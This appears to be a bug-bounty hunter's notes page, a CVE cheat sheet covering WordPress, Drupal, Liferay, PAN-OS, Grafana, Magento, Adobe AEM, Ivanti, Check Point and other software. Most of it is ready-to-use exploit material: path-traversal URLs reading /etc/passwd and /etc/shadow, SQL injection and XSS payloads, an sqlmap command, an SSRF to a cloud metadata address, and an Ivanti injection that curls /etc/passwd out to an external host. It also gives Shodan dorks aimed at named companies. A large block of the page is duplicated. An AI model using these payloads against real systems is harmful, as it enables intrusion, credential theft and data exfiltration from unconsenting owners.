💎My CVE Approach

HackerOneHackerOne

GitHub - nomi-sec/PoC-in-GitHub: 📡 PoC auto collect from GitHub. ⚠️ Be careful Malware.GitHub

GitHub - DarkFunct/TK-CVE-Repo: TK-CVE-RepoGitHub

Friends-Of-Presta Security AdvisoriesFriends-Of-Presta Security Advisories

WordPress and Plugings CVE

WooCommerce plugin allows LFI! 

02: Capture request in Burp

03: Change request method to POST and add:

POST /wp-admin/admin-ajax.php?template=../../../../../../../etc/passwd&value=a&min_symbols=1

04: Also add:

action=woof_text_search&

05: That’s it! You got local files.
-------------------------------------------------

CMS Technology Based CVE

Tomcat: /manager/tomcat /..;/

Drupal CMS:
/core/install.php
/install.php
Admin panel takeover
POC: cat ip.txt | while read host; do  for path in /install.php /core/install.php; do   echo "$host$path";  done; done | httpx -mc 200 -sc -cl -title | grep "Choose language"

Prestashop CMS module
POC: curl -v 'https://localhost/modules/appagebuilder/apajax.php?leoajax=1&product_manufacture=1,1)+or+sleep(4)%23--'
https://security.friendsofpresta.org/modules/2023/01/05/appagebuilder.html

Liferay CMS Portal RXSS - CVE-2025–4388 
https://medium.com/@tsxninja2004/rxss-on-mercedes-benz-71a839da2d31
Shodan: Hostname:"nokia.com"  html:"liferayPortalCSS"
Exploit URL: /o/marketplace-app-manager-web/icon.jsp?iconURL=https:///%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E

Liferay Portal/DXP Reflected XSS in Blogs Web - CVE-2025-4576
template: https://github.com/projectdiscovery/nuclei-templates/issues/12862
Shodan: Hostname:"nokia.com"  html:"liferayPortalCSS"
Exploit URL: /o/blogs-web/blogs/entry_cover_image_caption.jsp?coverImageCaption=%22%3E%3Cscript%3Ealert('XSS')%3C%2Fscript%3E"

Palo Alto Networks PAN‑OS - (XSS) vulnerability - CVE-2025–0133 
https://ch4ndan.medium.com/how-i-found-xss-cve-2025-0133-using-shodan-39a37eae7807
Shodan: hostname:target.com os:"PAN-OS"
Exploit URL: /ssl-vpn/getconfig.esp?client-type=1&protocol-version=p1&app-version=3.0.1-10&clientos=Linux&os-version=linux-64&hmac-algo=sha1%2Cmd5&enc-algo=aes-128-cbc%2Caes-256-cbc&authcookie=12cea70227d3aafbf25082fac1b6f51d&portal=us-vpn-gw-N&user=%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22XSS%22%29%3C%2Fscript%3E%3C%2Fsvg%3E&domain=%28empty_domain%29&computer=computer

Palo Alto Networks PAN-OS: OS Command Injection in GlobalProtect - CVE-2024-3400
https://github.com/schooldropout1337/CVE-2024-3400/blob/main/CVE20243400.yaml

Grafana Path Traversal - CVE-2025-4123 
https://github.com/ynsmroztas/CVE-2025-4123-Exploit-Tool-Grafana-
POC:
Open Redirect URL: http://103.175.2.234:30000/public/..%2F%5Cevil.com%2F%3f%2F..%2F..
SSRF URL: http://103.175.2.234:30000/public/..%2F%5C169.254.169.254/latest/meta-data/%2F%3f%2F..%2F..
[LFI URL:  http://103.175.2.234:30000/public/..%2F%5coast.pro%2F%3f%2F..%2F..%2F..%2Fetc%2Fpasswd
XSS URL:  http:
//103.175.2.234:30000/public/%3Cscript%3Ealert('mitsec')%3C%2Fscript%3E

Magento CMS - SQL injection -CVE-2019-8130
https://pentest-tools.com/blog/exploiting-sql-injection-in-magento-with-sqlmap
sqlmap -u 'http://db.novapay.com:8080/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=' -p "ids[0][product_id][to]" --prefix=")))" --suffix=" -- -" --technique=BT --ignore-code=400 --level=5 --risk=3  --no-cast  --batch

Minio Console - CVE-2023-28432
https://github.com/acheiii/CVE-2023-28432
POC:
POST /minio/bootstrap/v1/verify HTTP/1.1

Typo3 CMS: ?type=* parameter is vulnerable to SQL
Payload ; -1+OR+3 AND if(now()=sysdate(),SLEEP(9),0)-- wXyW2 AND if(now()=sysdate(),SLEEP(9),0)-- wXyW1=6 +AND+000762=000762

wordpress CMS:
https://github.com/m3ssap0/wordpress-really-simple-security-authn-bypass-exploit

Mura CMS:
https://github.com/Stuub/CVE-2024-32640-SQLI-MuraCMS?tab=readme-ov-file

Adobe Experience Manager:
1): Bug: Unauthorized Access to Adobe AEM CRX Namespace Editor
access control vulnerability was found in Adobe Experience Manager where the endpoint 
/crx/explorer/ui/namespace_editor.jsp 
allowed unauthenticated users to access and modify namespace entries within the CRX (Content Repository Extreme) Explorer.

2): XSS to childlist selector in AEM POC:
/sdfsdf.childrenlist.html
/sdfsdf.childrenlist.sdfsdf.html  
/xx<a href="javascript:prompt(document%2edomain)">aaaa.childrenlist.html
/seguros/especialidades/"><img src=a onerror=alert(document.domain)>.childrenlist.html
/etc/designs/xh1x.childrenlist.json//<img src=x onerror=alert(origin)>.html
/xh1x.childrenlist.json//%3Csvg%20onload=alert('XSS')%3E.htmlxx/etc/designs/xh1x.childrenlist.json

Web Framework Based CVE

Adobe ColdFusion:
1): Access Control Bypass
/restplay

Web Framework Based CVE

Adobe ColdFusion:
1): Access Control Bypass
/restplay
/CFIDE/restplay
/CFIDE/administrator
/CFIDE/adminapi
/CFIDE/main
/CFIDE/componentutils
/CFIDE/wizards
/CFIDE/servermanager
2): Reflected XSS
/asad"><img src=a onerror=alert(document.domain)>/..CFIDE/administrator/index.cfm

Wayback URL Grep CVE

cPanel RXSS CVE-2023-29489
/cpanelwebcall/<img src=x onerror="prompt(1)">aaaaaaaaaaaa

------------
JIRA Information Disclosure Endpoint:
cat endpoint.txt | grep "secure" | grep "jspa"
cat endpoint.txt | grep "jira"
Endpoint: /secure/QueryComponent!Default.jspa
------------
CVE-2023-25157 - GeoServer SQL Injection
https://github.com/win3zz/CVE-2023-25157
cat endpoint.txt | grep '/geoserver/ows/'
geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName=layername&CQL_FILTER=1=1;SELECT version()--

------------
SQL Injection
cat endpoint.txt | grep '?id='
Payload : if(now()=sysdate(),SLEEP(8),0)

------------
GANGLIA RXSS:
cat endpoint.txt | grep ganglia 
cat endpoint.txt | grep graph_all_periods.php
Vulnerable Parameter: h
Payload: ')"><img src=0 onerror=prompt();>

------------
Keycloak Endpoint
Keycloak 10.0.0 to 18.0.0 have a POST based XSS vulnerability at the endpoints
/auth/realms/master/clients-registrations/default
/auth/realms/master/clients-registrations/openid-connect
/realms/master/clients-registrations/default
/realms/master/clients-registrations/openid-connect

cat endpoint.txt | grep "keycloak"
cat endpoint.txt | grep "/realms/master"

Shodan search CVE

CVE-2024-24919 LFI - Path terversal
shodan http.html:"Check Point ssl network" ssl:"target"
POST /clients/MyCRL HTTP/1.1
host: target
Content-Length: 39

aCSHELL/../../../../../../../etc/shadow

====================================
IVANTI 
shodan title:"Ivanti Connect" hostname:"target.*"
Poc: https :// [ivanti-ip/domain]/api/v1/license/keys-status/;curl -X POST -d @/etc/passwd oastify[.]xxxxx
https://github.com/h4x0r-dz/CVE-2024-21893.py

====================================
CVE-2024-27348 (RCE) - 
Unauth users can execute commands via Groovy injection 
in Apache HugeGraph-Server.
Fix: Upgrade to version 1.3.0
POC: https://github.com/Zeyad-Azima/CVE-2024-27348
FOFA: app="HugeGraph-Studio"
SHODAN: http.title:"HugeGraph"

PreviousShodan Queries NextCVE-2025-29927 Nginx + Next.js Middleware Bypass

Last updated 1 month ago

Tomcat: /manager/tomcat /..;/ Drupal CMS: /core/install.php /install.php Admin panel takeover POC: cat ip.txt | while read host; do for path in /install.php /core/install.php; do echo "$host$path"; done; done | httpx -mc 200 -sc -cl -title | grep "Choose language" Prestashop CMS module POC: curl -v 'https://localhost/modules/appagebuilder/apajax.php?leoajax=1&product_manufacture=1,1)+or+sleep(4)%23--' https://security.friendsofpresta.org/modules/2023/01/05/appagebuilder.html Liferay CMS Portal RXSS - CVE-2025–4388 https://medium.com/@tsxninja2004/rxss-on-mercedes-benz-71a839da2d31 Shodan: Hostname:"nokia.com" html:"liferayPortalCSS" Exploit URL: /o/marketplace-app-manager-web/icon.jsp?iconURL=https:///%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E Liferay Portal/DXP Reflected XSS in Blogs Web - CVE-2025-4576 template: https://github.com/projectdiscovery/nuclei-templates/issues/12862 Shodan: Hostname:"nokia.com" html:"liferayPortalCSS" Exploit URL: /o/blogs-web/blogs/entry_cover_image_caption.jsp?coverImageCaption=%22%3E%3Cscript%3Ealert('XSS')%3C%2Fscript%3E" Palo Alto Networks PAN‑OS - (XSS) vulnerability - CVE-2025–0133 https://ch4ndan.medium.com/how-i-found-xss-cve-2025-0133-using-shodan-39a37eae7807 Shodan: hostname:target.com os:"PAN-OS" Exploit URL: /ssl-vpn/getconfig.esp?client-type=1&protocol-version=p1&app-version=3.0.1-10&clientos=Linux&os-version=linux-64&hmac-algo=sha1%2Cmd5&enc-algo=aes-128-cbc%2Caes-256-cbc&authcookie=12cea70227d3aafbf25082fac1b6f51d&portal=us-vpn-gw-N&user=%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22XSS%22%29%3C%2Fscript%3E%3C%2Fsvg%3E&domain=%28empty_domain%29&computer=computer Palo Alto Networks PAN-OS: OS Command Injection in GlobalProtect - CVE-2024-3400 https://github.com/schooldropout1337/CVE-2024-3400/blob/main/CVE20243400.yaml Grafana Path Traversal - CVE-2025-4123 https://github.com/ynsmroztas/CVE-2025-4123-Exploit-Tool-Grafana- POC: Open Redirect URL: http://103.175.2.234:30000/public/..%2F%5Cevil.com%2F%3f%2F..%2F.. SSRF URL: http://103.175.2.234:30000/public/..%2F%5C169.254.169.254/latest/meta-data/%2F%3f%2F..%2F.. [LFI URL: http://103.175.2.234:30000/public/..%2F%5coast.pro%2F%3f%2F..%2F..%2F..%2Fetc%2Fpasswd XSS URL: http: //103.175.2.234:30000/public/%3Cscript%3Ealert('mitsec')%3C%2Fscript%3E Magento CMS - SQL injection -CVE-2019-8130 https://pentest-tools.com/blog/exploiting-sql-injection-in-magento-with-sqlmap sqlmap -u 'http://db.novapay.com:8080/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=' -p "ids[0][product_id][to]" --prefix=")))" --suffix=" -- -" --technique=BT --ignore-code=400 --level=5 --risk=3 --no-cast --batch Minio Console - CVE-2023-28432 https://github.com/acheiii/CVE-2023-28432 POC: POST /minio/bootstrap/v1/verify HTTP/1.1 Typo3 CMS: ?type=* parameter is vulnerable to SQL Payload ; -1+OR+3 AND if(now()=sysdate(),SLEEP(9),0)-- wXyW2 AND if(now()=sysdate(),SLEEP(9),0)-- wXyW1=6 +AND+000762=000762 wordpress CMS: https://github.com/m3ssap0/wordpress-really-simple-security-authn-bypass-exploit Mura CMS: https://github.com/Stuub/CVE-2024-32640-SQLI-MuraCMS?tab=readme-ov-file Adobe Experience Manager: 1): Bug: Unauthorized Access to Adobe AEM CRX Namespace Editor access control vulnerability was found in Adobe Experience Manager where the endpoint /crx/explorer/ui/namespace_editor.jsp allowed unauthenticated users to access and modify namespace entries within the CRX (Content Repository Extreme) Explorer. 2): XSS to childlist selector in AEM POC: /sdfsdf.childrenlist.html /sdfsdf.childrenlist.sdfsdf.html /xx<a href="javascript:prompt(document%2edomain)">aaaa.childrenlist.html /seguros/especialidades/"><img src=a onerror=alert(document.domain)>.childrenlist.html /etc/designs/xh1x.childrenlist.json//<img src=x onerror=alert(origin)>.html /xh1x.childrenlist.json//%3Csvg%20onload=alert('XSS')%3E.htmlxx/etc/designs/xh1x.childrenlist.json

hashtagWordPress and Plugings CVE

hashtagCMS Technology Based CVE

hashtagWeb Framework Based CVE

hashtagWeb Framework Based CVE

hashtagWayback URL Grep CVE

hashtagShodan search CVE

WordPress and Plugings CVE

CMS Technology Based CVE

Web Framework Based CVE

Web Framework Based CVE

Wayback URL Grep CVE

Shodan search CVE